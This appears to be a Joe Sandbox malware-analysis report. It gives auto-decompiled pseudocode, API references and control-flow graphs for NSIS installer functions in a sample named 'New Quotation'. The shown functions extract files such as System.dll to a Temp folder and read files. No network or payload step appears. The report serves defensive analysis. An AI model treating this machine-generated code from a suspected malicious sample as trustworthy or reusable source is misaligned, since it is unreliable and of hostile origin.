                                                                                                                                                                                          			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E83( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405E0C(E0040653D(_t81, L"C:\\Users\\Arthur\\AppData\\Local\\Temp")), ??);
				} else {
					E0040653D();
				}
				E004067C4(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406873(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406008(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040559F(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x434f88;
						goto L32;
					} else {
						E0040653D("C:\Users\Arthur\AppData\Local\Temp\nse2C2.tmp", _t83);
						E0040653D(_t83, _t81);
						E0040657A(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nse2C2.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653D(_t83, "C:\Users\Arthur\AppData\Local\Temp\nse2C2.tmp");
						_t64 = E00405B9D("C:\Users\Arthur\AppData\Local\Temp\nse2C2.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040559F();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
				 *0x434fb4 =  *0x434fb4 + 1;
				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x434fb4 =  *0x434fb4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B9D();
					goto L29;
				}
				goto L33;
			}


















                                                                                                                                                                                          0x0040176f
                                                                                                                                                                                          0x00401776
                                                                                                                                                                                          0x00401782
                                                                                                                                                                                          0x00401785
                                                                                                                                                                                          0x0040178a
                                                                                                                                                                                          0x0040178d
                                                                                                                                                                                          0x00401794
                                                                                                                                                                                          0x004017b0
                                                                                                                                                                                          0x00401796
                                                                                                                                                                                          0x00401797
                                                                                                                                                                                          0x00401797
                                                                                                                                                                                          0x004017b6
                                                                                                                                                                                          0x004017bb
                                                                                                                                                                                          0x004017bb
                                                                                                                                                                                          0x004017bf
                                                                                                                                                                                          0x004017c2
                                                                                                                                                                                          0x004017c7
                                                                                                                                                                                          0x004017c9
                                                                                                                                                                                          0x004017cb
                                                                                                                                                                                          0x004017d0
                                                                                                                                                                                          0x004017d0
                                                                                                                                                                                          0x004017db
                                                                                                                                                                                          0x004017db
                                                                                                                                                                                          0x004017ec
                                                                                                                                                                                          0x004017ee
                                                                                                                                                                                          0x004017ee
                                                                                                                                                                                          0x004017ef
                                                                                                                                                                                          0x004017ef
                                                                                                                                                                                          0x004017f2
                                                                                                                                                                                          0x004017f5
                                                                                                                                                                                          0x004017f8
                                                                                                                                                                                          0x004017f8
                                                                                                                                                                                          0x004017ff
                                                                                                                                                                                          0x0040180e
                                                                                                                                                                                          0x00401813
                                                                                                                                                                                          0x00401816
                                                                                                                                                                                          0x00401819
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040181b
                                                                                                                                                                                          0x0040181e
                                                                                                                                                                                          0x00401874
                                                                                                                                                                                          0x00401879
                                                                                                                                                                                          0x004015b6
                                                                                                                                                                                          0x0040292e
                                                                                                                                                                                          0x0040292e
                                                                                                                                                                                          0x00402c2a
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401820
                                                                                                                                                                                          0x00401826
                                                                                                                                                                                          0x0040182d
                                                                                                                                                                                          0x0040183a
                                                                                                                                                                                          0x00401845
                                                                                                                                                                                          0x0040185b
                                                                                                                                                                                          0x0040185b
                                                                                                                                                                                          0x0040185e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401864
                                                                                                                                                                                          0x00401864
                                                                                                                                                                                          0x00401865
                                                                                                                                                                                          0x00401882
                                                                                                                                                                                          0x00402c33
                                                                                                                                                                                          0x00402c33
                                                                                                                                                                                          0x00402c33
                                                                                                                                                                                          0x00401867
                                                                                                                                                                                          0x00401867
                                                                                                                                                                                          0x00401868
                                                                                                                                                                                          0x00401493
                                                                                                                                                                                          0x0040239d
                                                                                                                                                                                          0x0040239d
                                                                                                                                                                                          0x0040239d
                                                                                                                                                                                          0x00401865
                                                                                                                                                                                          0x0040185e
                                                                                                                                                                                          0x00402c35
                                                                                                                                                                                          0x00402c39
                                                                                                                                                                                          0x00402c39
                                                                                                                                                                                          0x00401892
                                                                                                                                                                                          0x00401897
                                                                                                                                                                                          0x004018a5
                                                                                                                                                                                          0x004018aa
                                                                                                                                                                                          0x004018b0
                                                                                                                                                                                          0x004018b4
                                                                                                                                                                                          0x004018b6
                                                                                                                                                                                          0x004018be
                                                                                                                                                                                          0x004018ca
                                                                                                                                                                                          0x004018b8
                                                                                                                                                                                          0x004018b8
                                                                                                                                                                                          0x004018bc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004018bc
                                                                                                                                                                                          0x004018d3
                                                                                                                                                                                          0x004018d9
                                                                                                                                                                                          0x004018db
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004018e1
                                                                                                                                                                                          0x004018e1
                                                                                                                                                                                          0x004018e4
                                                                                                                                                                                          0x004018fc
                                                                                                                                                                                          0x004018e6
                                                                                                                                                                                          0x004018e9
                                                                                                                                                                                          0x004018f2
                                                                                                                                                                                          0x004018f2
                                                                                                                                                                                          0x00401901
                                                                                                                                                                                          0x00401906
                                                                                                                                                                                          0x00402398
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402398
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                                                                                                                                            • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                                                                                            • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,00000000,00425A20,753623A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                            • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,00000000,00425A20,753623A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                            • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                                            • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll), ref: 0040560C
                                                                                                                                                                                            • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                            • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                            • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nse2C2.tmp$C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll$Call
                                                                                                                                                                                          • API String ID: 1941528284-4062461101
                                                                                                                                                                                          • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                                                                                                                                          • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                                                                                                                                          • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                                                                                                                                          • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040559F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 856 40559f-4055b4 857 4055ba-4055cb 856->857 858 40566b-40566f 856->858 859 4055d6-4055e2 lstrlenW 857->859 860 4055cd-4055d1 call 40657a 857->860 862 4055e4-4055f4 lstrlenW 859->862 863 4055ff-405603 859->863 860->859 862->858 864 4055f6-4055fa lstrcatW 862->864 865 405612-405616 863->865 866 405605-40560c SetWindowTextW 863->866 864->863 867 405618-40565a SendMessageW * 3 865->867 868 40565c-40565e 865->868 866->865 867->868 868->858 869 405660-405663 868->869 869->858
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040559F(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ee4; // 0x10448
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
					}
					_t27 = lstrlenW(0x42c248);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c248;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c248[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c248, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                                                                                                                                                          0x004055a5
                                                                                                                                                                                          0x004055af
                                                                                                                                                                                          0x004055b4
                                                                                                                                                                                          0x004055ba
                                                                                                                                                                                          0x004055c5
                                                                                                                                                                                          0x004055c8
                                                                                                                                                                                          0x004055cb
                                                                                                                                                                                          0x004055d1
                                                                                                                                                                                          0x004055d1
                                                                                                                                                                                          0x004055d7
                                                                                                                                                                                          0x004055df
                                                                                                                                                                                          0x004055e2
                                                                                                                                                                                          0x004055ff
                                                                                                                                                                                          0x00405603
                                                                                                                                                                                          0x0040560c
                                                                                                                                                                                          0x0040560c
                                                                                                                                                                                          0x00405616
                                                                                                                                                                                          0x0040561f
                                                                                                                                                                                          0x0040562b
                                                                                                                                                                                          0x00405632
                                                                                                                                                                                          0x00405636
                                                                                                                                                                                          0x00405639
                                                                                                                                                                                          0x0040564c
                                                                                                                                                                                          0x0040565a
                                                                                                                                                                                          0x0040565a
                                                                                                                                                                                          0x0040565e
                                                                                                                                                                                          0x00405660
                                                                                                                                                                                          0x00405663
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405663
                                                                                                                                                                                          0x004055e4
                                                                                                                                                                                          0x004055ec
                                                                                                                                                                                          0x004055f4
                                                                                                                                                                                          0x004055fa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004055fa
                                                                                                                                                                                          0x004055f4
                                                                                                                                                                                          0x004055e2
                                                                                                                                                                                          0x0040566f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,00000000,00425A20,753623A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                          • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,00000000,00425A20,753623A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                          • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                                          • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll), ref: 0040560C
                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                            • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                            • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                                                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll
                                                                                                                                                                                          • API String ID: 1495540970-1163036964
                                                                                                                                                                                          • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                                                                                                                          • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                                                                                                                          • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 870 4026ec-402705 call 402d84 873 402c2a-402c2d 870->873 874 40270b-402712 870->874 877 402c33-402c39 873->877 875 402714 874->875 876 402717-40271a 874->876 875->876 878 402720-40272f call 40649d 876->878 879 40287e-402886 876->879 878->879 883 402735 878->883 879->873 884 40273b-40273f 883->884 885 4027d4-4027d7 884->885 886 402745-402760 ReadFile 884->886 888 4027d9-4027dc 885->888 889 4027ef-4027ff call 4060b0 885->889 886->879 887 402766-40276b 886->887 887->879 891 402771-40277f 887->891 888->889 892 4027de-4027e9 call 40610e 888->892 889->879 897 402801 889->897 894 402785-402797 MultiByteToWideChar 891->894 895 40283a-402846 call 406484 891->895 892->879 892->889 894->897 898 402799-40279c 894->898 895->877 901 402804-402807 897->901 902 40279e-4027a9 898->902 901->895 904 402809-40280e 901->904 902->901 905 4027ab-4027d0 SetFilePointer MultiByteToWideChar 902->905 906 402810-402815 904->906 907 40284b-40284f 904->907 905->902 908 4027d2 905->908 906->907 909 402817-40282a 906->909 910 402851-402855 907->910 911 40286c-402878 SetFilePointer 907->911 908->897 909->879 912 40282c-402832 909->912 913 402857-40285b 910->913 914 40285d-40286a 910->914 911->879 912->884 915 402838 912->915 913->911 913->914 914->879 915->879
                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                          			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
														__ebp - 0x50 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                                                                                                                                          0x004026ec
                                                                                                                                                                                          0x004026ee
                                                                                                                                                                                          0x004026f1
                                                                                                                                                                                          0x004026f3
                                                                                                                                                                                          0x004026f6
                                                                                                                                                                                          0x004026fb
                                                                                                                                                                                          0x004026ff
                                                                                                                                                                                          0x00402702
                                                                                                                                                                                          0x00402705
                                                                                                                                                                                          0x00402c2a
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x0040270b
                                                                                                                                                                                          0x0040270b
                                                                                                                                                                                          0x00402712
                                                                                                                                                                                          0x00402714
                                                                                                                                                                                          0x00402714
                                                                                                                                                                                          0x0040271a
                                                                                                                                                                                          0x0040287e
                                                                                                                                                                                          0x0040287e
                                                                                                                                                                                          0x00402881
                                                                                                                                                                                          0x00402886
                                                                                                                                                                                          0x004015b6
                                                                                                                                                                                          0x0040292e
                                                                                                                                                                                          0x0040292e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402720
                                                                                                                                                                                          0x00402721
                                                                                                                                                                                          0x0040272c
                                                                                                                                                                                          0x0040272f
                                                                                                                                                                                          0x0040273b
                                                                                                                                                                                          0x0040273f
                                                                                                                                                                                          0x004027d7
                                                                                                                                                                                          0x004027ef
                                                                                                                                                                                          0x004027ff
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402745
                                                                                                                                                                                          0x00402745
                                                                                                                                                                                          0x00402748
                                                                                                                                                                                          0x00402749
                                                                                                                                                                                          0x0040274c
                                                                                                                                                                                          0x00402751
                                                                                                                                                                                          0x00402758
                                                                                                                                                                                          0x00402760
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402766
                                                                                                                                                                                          0x00402766
                                                                                                                                                                                          0x0040276b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402771
                                                                                                                                                                                          0x00402771
                                                                                                                                                                                          0x00402779
                                                                                                                                                                                          0x0040277c
                                                                                                                                                                                          0x0040277f
                                                                                                                                                                                          0x0040283a
                                                                                                                                                                                          0x00402841
                                                                                                                                                                                          0x00402785
                                                                                                                                                                                          0x0040278b
                                                                                                                                                                                          0x00402797
                                                                                                                                                                                          0x00402801
                                                                                                                                                                                          0x00402801
                                                                                                                                                                                          0x00402799
                                                                                                                                                                                          0x00402799
                                                                                                                                                                                          0x0040279c
                                                                                                                                                                                          0x0040279e
                                                                                                                                                                                          0x0040279e
                                                                                                                                                                                          0x0040279e
                                                                                                                                                                                          0x004027a1
                                                                                                                                                                                          0x004027a6
                                                                                                                                                                                          0x004027a9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004027ab
                                                                                                                                                                                          0x004027ae
                                                                                                                                                                                          0x004027b6
                                                                                                                                                                                          0x004027c2
                                                                                                                                                                                          0x004027d0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004027d2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004027d2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004027d0
                                                                                                                                                                                          0x0040279e
                                                                                                                                                                                          0x00402804
                                                                                                                                                                                          0x00402807
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402809
                                                                                                                                                                                          0x0040280e
                                                                                                                                                                                          0x0040284f
                                                                                                                                                                                          0x00402871
